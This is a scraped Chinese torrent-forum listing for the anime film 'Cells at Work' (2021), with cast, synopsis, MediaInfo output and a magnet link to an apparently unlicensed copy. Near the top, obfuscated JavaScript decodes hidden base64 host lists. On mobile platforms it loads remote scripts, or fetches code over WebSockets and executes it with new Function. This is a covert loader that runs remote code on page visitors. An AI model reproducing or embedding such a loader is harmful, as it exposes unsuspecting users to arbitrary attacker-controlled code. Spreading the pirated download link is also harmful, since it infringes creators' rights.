工作细胞:细胞大作战[国语配音/中文字幕].Cells.At.Work.2021.1080p.WEB-DL.H264.AAC.2Audio 4.07GB

版主小s 1月前 260

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 工作细胞:细胞大作战/工作細胞 特別上映版:強「菌」襲來!人體腸道大騷動!/工作细胞!!强菌袭来,人体肠道大骚动!
◎片  名 はたらく細胞!! 最強の敵、再び。体の中は“腸”大騒ぎ!
◎年  代 2020
◎产  地 日本
◎类  别 喜剧 / 动画
◎语  言 日语
◎上映日期 2020-09-05(日本) / 2021-04-09(中国大陆)
◎豆瓣评分 6.9/10 from 7132 users
◎豆瓣链接 https://movie.douban.com/subject/35131877/
◎片  长 112分钟
◎导  演 小仓宏文 Hirofumi Ogura
◎编  剧 柿原优子 Yuuko Kakihara / 清水茜 Shimizu Akane
◎主  演 花泽香菜 Kana Hanazawa
       前野智昭 Tomoaki Maeno
       小野大辅 Daisuke Ono
       井上喜久子 Kikuko Inoue
       长绳麻理亚 Maria Naganawa
       早见沙织 Saori Hayami
       行成桃姬 Toa Yukinari
       小林裕介 Yuusuke Kobayashi
       吉田有里 Yuri Yoshida
       高桥李依 Rie Takahashi
       藤原夏海 Natsumi Fujiwara
       久保由利香 Yurika Kubo
       石田彰 Akira Ishida
       能登麻美子 Mamiko Noto

◎标  签 日本 | 动画 | 动漫 | 剧场版 | 动画电影 | 日漫影 | 电影 | 2020

◎简  介

  这是人类的体内。
  
  许许多多的细胞勤奋工作的世界。
  
  某日白细胞(中性粒细胞)与红细胞,遇见了收留迷路乳酸菌的一般细胞。为了将乳酸菌护送至同伴身边,白细胞(中性粒细胞)与一般细胞向肠道出发。
  
  然而他们却与来者不善的最强敌人重逢。
  
  「我和你们到底谁才是正义的一方,趁这次弄个清楚吧」
  
  再次现身的癌细胞。以及遭到坏菌破坏的肠内环境。
  
  体内遭遇前所未有的大危机!?
  
  「束手就擒吧 癌细胞!」
  
  为了守护这个世界,白细胞们(中性粒细胞)向赌上世界命运的大战发起挑战。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 128804110732093764275505519675847467178 (0x60E6C4F63681536AB2E9A38314C7E0AA)

  4. Complete name                            : 工作细胞:细胞大作战_原版_.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 4.07 GiB

  8. Duration                                 : 1 h 50 min

  9. Overall bit rate                         : 5 274 kb/s

  10. Encoded date                             : UTC 2021-08-29 04:22:05

  11. Writing application                      : mkvmerge v51.0.0 ('I Wish') 64-bit

  12. Writing library                          : libebml v1.4.0 + libmatroska v1.6.2


  13. Video

  14. ID                                       : 1

  15. Format                                   : AVC

  16. Format/Info                              : Advanced Video Codec

  17. Format profile                           : [email protected]

  18. Format settings                          : CABAC / 6 Ref Frames

  19. Format settings, CABAC                   : Yes

  20. Format settings, Reference frames        : 6 frames

  21. Codec ID                                 : V_MPEG4/ISO/AVC

  22. Duration                                 : 1 h 50 min

  23. Bit rate                                 : 4 615 kb/s

  24. Width                                    : 1 998 pixels

  25. Height                                   : 1 080 pixels

  26. Display aspect ratio                     : 1.85:1

  27. Frame rate mode                          : Constant

  28. Frame rate                               : 24.000 FPS

  29. Color space                              : YUV

  30. Chroma subsampling                       : 4:2:0

  31. Bit depth                                : 8 bits

  32. Scan type                                : Progressive

  33. Bits/(Pixel*Frame)                       : 0.089

  34. Stream size                              : 3.56 GiB (88%)

  35. Default                                  : Yes

  36. Forced                                   : No

  37. Color range                              : Limited

  38. Color primaries                          : BT.709

  39. Transfer characteristics                 : BT.709

  40. Matrix coefficients                      : BT.709


  41. Audio #1

  42. ID                                       : 2

  43. Format                                   : AAC LC

  44. Format/Info                              : Advanced Audio Codec Low Complexity

  45. Codec ID                                 : A_AAC-2

  46. Duration                                 : 1 h 50 min

  47. Bit rate                                 : 328 kb/s

  48. Channel(s)                               : 2 channels

  49. Channel layout                           : L R

  50. Sampling rate                            : 48.0 kHz

  51. Frame rate                               : 46.875 FPS (1024 SPF)

  52. Compression mode                         : Lossy

  53. Stream size                              : 259 MiB (6%)

  54. Language                                 : Japanese

  55. Default                                  : Yes

  56. Forced                                   : No


  57. Audio #2

  58. ID                                       : 3

  59. Format                                   : AAC LC

  60. Format/Info                              : Advanced Audio Codec Low Complexity

  61. Codec ID                                 : A_AAC-2

  62. Duration                                 : 1 h 50 min

  63. Bit rate                                 : 328 kb/s

  64. Channel(s)                               : 2 channels

  65. Channel layout                           : L R

  66. Sampling rate                            : 48.0 kHz

  67. Frame rate                               : 46.875 FPS (1024 SPF)

  68. Compression mode                         : Lossy

  69. Stream size                              : 259 MiB (6%)

  70. Language                                 : Chinese

  71. Default                                  : No

  72. Forced                                   : No



TAGS 动画 喜剧

磁力链:
  • magnet:?xt=urn:btih:F00510BD15C58280E5315552888C1FEF60A89108
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖